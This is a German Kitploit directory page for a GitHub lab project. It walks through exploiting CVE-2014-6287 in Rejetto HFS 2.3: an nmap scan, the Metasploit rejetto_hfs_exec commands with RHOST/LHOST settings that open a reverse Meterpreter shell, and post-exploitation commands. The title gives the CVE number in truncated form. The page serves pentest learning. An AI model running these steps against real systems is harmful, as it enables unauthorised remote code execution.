Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HFS_EXPLOIT_PROJECT — Metasploit RCE auf HFS 2.3 - CVE-2014-62 | Kitploit
Tools/GitHubGitHub/sage954526/hfs_exploit_project
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubsage954526/hfs_exploit_project

HFS_EXPLOIT_PROJECT

Metasploit RCE auf HFS 2.3 - CVE-2014-62

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

HFS_EXPLOIT_PROJECT

Metasploit RCE auf HFS 2.3 - CVE-2014-62

🔖 Titel des Projekts

root@kitploit:~
> Remote Code Execution über HTTP File Server (HFS 2.3)

⚙ Verwendete Tools • Kali Linux • Nmap • Metasploit • Ziel: HFS 2.3 auf Windows 7

🔐 Schwachstellen-Details • Name: CVE-2014-6287 • Typ: Remote Code Execution • Ursache: Nicht validierte Eingabe im HFS-Skripting • Auswirkung: Nicht authentifizierter Shell-Zugriff

🔍 Methodik (Schritt für Schritt)

🔹 Schritt 1: Informationssammlung (Nmap)

root@kitploit:~
•    nmap -sV demo.ine.local (IP des Ziels) 
•    offener Port gefunden: 80
•    Dienst: rejetto HTTP file server 2.3

Nmap-Scan

Nmap

🔹 Schritt 2: Ausnutzung (Metasploit)

root@kitploit:~
• Msfconsole
• Suche nach HFS oder rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run

Exploit-Setup

Exploit Exploit

Tool herunterladen

🔹 Schritt 3: Post-Exploitation

Nach dem Ausführen erhältst du eine Meterpreter-Sitzung Verwende den Befehl: shell

• whoami • ipconfig • dir

Shell-Zugriff

Shell

Shell**